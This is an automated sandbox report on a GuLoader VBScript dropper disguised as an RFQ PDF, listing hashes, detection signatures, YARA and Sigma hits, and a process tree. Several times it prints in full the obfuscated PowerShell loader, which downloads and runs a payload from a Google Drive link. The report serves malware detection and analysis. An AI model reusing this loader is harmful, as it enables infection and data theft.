Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_24196MR_PDF.vbs

Overview

General Information

Sample name:RFQ_24196MR_PDF.vbs
Analysis ID:1542324
MD5:474b9097fcb25c257bedf34672e6bb46
SHA1:67ac04f1e475d3e7402ae654356076cc438dfcd5
SHA256:bb1c7774dbafab1dcdf39f6513f622cb2c9c60324ef033189dd448973911bee6
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6892 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 6288 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkl. Precs ennepStandLRevisiSyr rtStive(C.lpi$B.unhuPreden AltaPBrolgr U etiDualiNSulfocBe.aaiHelioPMi dea Out.l Ga.n)B per ');Salvierne (Katabolize $Klaner);$Achinese=$Chairmending[0];$jeff=(Katabolize 'I,akt$FjernGnondeLOpslaOUnna BlinaraMorgul Af.o:Odenus DftvKExactaZoom THarattVifteE PhenPA lycl freni MagiG Flokt rdblSB irnrNeuroE G orgArthrLCloseeJamreRParisn Lrere Beha= Epi,nSvigeELandvW C.tl-WaterOHer.iB,pilljVaregeTilpac AntaTprete ColopSEquimy LretsGastrTTypogEcasenMInter.FigurNFortyEClamoTMicro.Pa alWLoot.EInve BfremsC KiwiLTommei .ognEUdskrNImprot.onpe ');Salvierne ($jeff);Salvierne (Katabolize 'Habit$UnigeSMythik GyroaK nkutOkkertAna.teOm kip eerelWor.biacc,igErhvetThrupsPrisorS naleSki kgm llolUngueeBurtir CholnStudee,nson. rodeH Milie ledia Sn.vdHoldke FirprUmor sStudi[Dovne$ValveU spildT ldkeThe.tkScalaaH fremTrykkp iskeeAbte nDiaz,e TornsErhve] Shap=S ige$CeliaDDeligi Rv rsSnickkNummme Ri,etPal ot Raree OpklsBet ttKlingr roseeF,edrl Fjers.anniemic,erO.ryknZoblee Aand ');$Staldes61=Katabolize ' Preu$factiSRektokUtjleaMo.odtlignitConnueSeppsp W ndl Uni iBarndgLipart ,dvls Cestr ResseIndplgUd,nrlVer neA lomrRens nIntereTreat. mrt DPro eoS quewFavisn Elecl OmlgoTheolaRese,dPteryFGalliiPetrolLivsneJudge(Hagen$Indt AAnkhhcDv hjh Hairi Vainn Gaffe Sca.sGaffeeBevar, Be.r$ DdsaM mor.eKan.lm Ge.io SeemrSituai semia ,atal AutoiFiliazMelaneservir Equi)Aor i ';$Memorializer=$Vesteuropers;Salvierne (Katabolize 'Nestl$Re.utgT lbeLJordvo,gnspBGenanaSjlevlpurpo: O,taV AcquEG ldmnDybd.eMod lRS tariFr aaa BistlPause=Bronk(Ukrtst ,risE Ad aS PhratSpnde-BroklpNove.aSaventParomh H lk Samm$Pseu MOutyiE F.lemParakoPumelr roekITydelAH licL.elatIKommeZDisseenonnir Udfo)nytte ');while (!$Venerial) {Salvierne (Katabolize 'magi $T stigcancrlElaeooModerbTmmeraOxsholHavka:UforsK A.prvBlokfiInforv,jersaKonvelSarcoebiphenParrhsFrekieKulegrsombrn Towne Anti=D,cet$stilstDisgirS.ockuSlusee Dobb ') ;Salvierne $Staldes61;Salvierne (Katabolize 'EfterS A,tstLambeaPoritrCarabtUnvol- Extos Immel Lstee VandeF,rmaPSk ts Glycf4 odd ');Salvierne (Katabolize 'Subfu$Opklog Pr dL urhno Prosb laa aBra,dL Fe s: IdeaVForsyE,fmaanReferEFairyRUudf IFecunAF,ugtLAfhol=Genne( Be at geguEAnstrSTavleTBogma-Uz ekpSnoreaBilagt DoktHProfe Trrel$A tromtro seEngloMPensiococklrAngboiDunama E,swLNontrIThranz aihEInd,cr Oege)Ovovi ') ;Salvierne (Katabolize ' sust$Pag ng Uncol S,veoL bstBManipA sutlLpredo:SpileBCruroI S lplUnderSCrede=Bref $Kna hgSkmteLi,dkaoB.yauBKnockA evanlMicri: BallFsekunDOatmeE grierT,enaaAmarot PersIDiwa OAuxo.NUltraeDarshRMa.han SemieStemmSHogge+H per+Dec n% Fo e$Mess CTilskh,olffaReta IFirmarFrogeM.ifehECompunMicrodAlismiTnkebNVestsgPoint.HypercA,skiO Cytoufadern H drtS omi ') ;$Achinese=$Chairmending[$Bils];}$Gershwin=294146;$Runologs=30619;Salvierne (Katabolize 'Leitn$Boos GSystel Te,eo redibHoaxaA ov rLMenne:coetas Lu rULat,okHet rUMosel slemm=Panel coo cgTra seSnotttLini,- ilkwCCr scoKontrnfinantJas.iEBeskfNChumsTCoypu Elev $Un lam aspeEsupermHalshO SkaaROpslaIRemisaContolPlec.IFjeldZAnsaeE Sam r B av ');Salvierne (Katabolize 'Staal$LnestgKarial,oloko Kubibnon,paB,usclHalvf:Sen sCSynalo GrizrFormui Co uoBev llru icaHerednAlloiu PoetsD sla fortr=Splej Crosb[DemilS pookyTbru,sAppentConfie PostmTandf.InsucCAlm eorelaxnSympavRagf eVascurRubeotHaar ]Bala.:dy.sm:AberiFLandsrUmot.oLec,nm,arthB Kri,a Re asDagdreB,egn6Frkri4MarsiSrunketSwamprD graiV,dernLandsgR.bec(Strej$BabylSNoteduDistik Pinsu Skif)K.lon ');Salvierne (Katabolize 'Lunkn$EveryG HusklWeakmOSnekkbStatuATam yLSyste:frasokLivsfOS rmsNso twS SejluSkattmSpi aP,tiditAest iGtestOVaflenAffin Spraw=Swing Bered[ RecrS TeksyAblepsF yttT retE ParamAccel. ChanT NonfEOpsnaxGron tunike. Rdtkeflettn Ud yCForkooEsko.DComanIS rrenAndangIn,ra] lari: Pyro:LydbaaBar.nsStreaCLreprIMetalIHomof. SaarG rek e FibrTSacrischyloTMusetRCranciBayonnulvemg Be i(Dios $Armfuc StikOPriorRBugbaIsuc,eOnatteLSprgea achsnEkspeuIndmaSPale.)Befre ');Salvierne (Katabolize 'Hoove$NonpeGSygeslRednioLeflebDefasAHgneslqu nt: orfasInficuFo valMonomF,omsaoBu,ttnLandmePowderItlloEkolikRFunkt=Ariad$BrepikMadisOTakeanAtt kS R,mfU HalvMPluriPIncortColloiTelefOUnpenNTi sb.Langns ForhuUnde bUn.erSServ Tres sR RengI InconBun eg Ha.k( Atta$ Pu lgBibesEDolo rStyrkscalamHAnt bW laniWoubiNf.yve,Stiko$ exacRTeaboUV,nneNInimiOS lvslTilfoOTilegg Ivr.s Brnd)Slvkr ');Salvierne $Sulfonerer;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 4092 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
      • WerFault.exe (PID: 4812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 2292 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000006.00000002.2132213145.0000000008610000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    00000006.00000002.2113399982.0000000005665000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      00000006.00000002.2132748645.0000000008DD5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        00000001.00000002.1939147276.000001DEEBB8F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          Process Memory Space: powershell.exe PID: 7100JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Click to see the 3 entries

            Other

            SourceRuleDescriptionAuthorStrings
            amsi64_7100.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_7100.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10113:$b2: ::FromBase64String(
              • 0xd4ca:$s1: -join
              • 0x6c76:$s4: +=
              • 0x6d38:$s4: +=
              • 0xaf5f:$s4: +=
              • 0xd07c:$s4: +=
              • 0xd366:$s4: +=
              • 0xd4ac:$s4: +=
              • 0xeca4:$s4: +=
              • 0xed24:$s4: +=
              • 0xedea:$s4: +=
              • 0xee6a:$s4: +=
              • 0xf040:$s4: +=
              • 0xf0c4:$s4: +=
              • 0xf8ed:$e4: Get-WmiObject
              • 0xfadc:$e4: Get-Process
              • 0xfb34:$e4: Start-Process
              amsi32_6288.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xc8db:$b2: ::FromBase64String(
              • 0x9d62:$s1: -join
              • 0x350e:$s4: +=
              • 0x35d0:$s4: +=
              • 0x77f7:$s4: +=
              • 0x9914:$s4: +=
              • 0x9bfe:$s4: +=
              • 0x9d44:$s4: +=
              • 0xb53c:$s4: +=
              • 0xb5bc:$s4: +=
              • 0xb682:$s4: +=
              • 0xb702:$s4: +=
              • 0xb8d8:$s4: +=
              • 0xb95c:$s4: +=
              • 0xc185:$e4: Get-WmiObject
              • 0xc374:$e4: Get-Process
              • 0xc3cc:$e4: Start-Process
              • 0x14a8b:$e4: Get-Process

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", ProcessId: 6892, ProcessName: wscript.exe
              Sigma detected: Msiexec Initiated Connection
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 142.250.185.238, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 4092, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49739
              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_24196MR_PDF.vbs", ProcessId: 6892, ProcessName: wscript.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A 